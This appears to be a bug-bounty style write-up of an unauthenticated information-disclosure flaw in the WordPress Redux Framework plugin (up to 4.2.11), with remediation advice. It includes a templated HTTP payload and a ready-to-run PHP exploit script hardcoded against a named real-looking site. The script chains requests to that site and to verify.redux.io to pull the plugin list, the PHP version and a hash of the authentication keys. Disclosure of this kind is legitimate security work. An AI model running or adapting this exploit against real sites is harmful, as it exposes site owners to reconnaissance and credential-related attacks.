Description

The WordPress Redux Framework plugin (versions up to 4.2.11) is vulnerable to information disclosure due to improperly secured AJAX actions. These actions, defined in redux-core/class-redux-core.php, are accessible to unauthenticated users and are generated using predictable MD5 hashes of the site URL with known salt values (-redux and -support).

An attacker can exploit this vulnerability to retrieve:

  • A list of active plugins and their versions
  • The site's PHP version
  • An unsalted MD5 hash of the site's AUTH_KEY concatenated with SECURE_AUTH_KEY

This vulnerability could assist attackers in reconnaissance or further exploitation of the affected WordPress site.

Impact

An attacker can exploit this vulnerability to gain sensitive information from the target system, which may lead to further exploitation.

Remediation

Update WordPress Redux Framework to version 4.2.12 or later to mitigate this vulnerability.

Steps to Reproduce

  1. Identify a WordPress website using the Redux Framework plugin (version <= 4.2.11).
  2. Compute the MD5 hash of the target site's URL concatenated with -redux.
  3. Send a request to /wp-admin/admin-ajax.php?action={MD5_HASH}.
  4. If successful, the response will contain sensitive information such as installed plugins, PHP version, and authentication keys.

Payloads


 GET /wp-admin/admin-ajax.php?action={{md5(replace('http://HOST/-redux','HOST',Hostname))}} HTTP/1.1
 Host: target.com
 Accept: */*

Exploit Code


<?php
$target = "https://groww.in";
$key1 = md5("$target/-redux");
$key2 = file_get_contents("$target/wp-admin/admin-ajax.php?action=$key1");
$key3 = md5($key2.'-support');
$redux_code = file_get_contents("http://verify.redux.io/?hash=$key3&site=$target/");
echo file_get_contents("$target/wp-admin/admin-ajax.php?action=$key3&code=$redux_code");?>

POC Video

Thanks for reading! If you found this useful, feel free to share it with your fellow hunters. Happy hacking!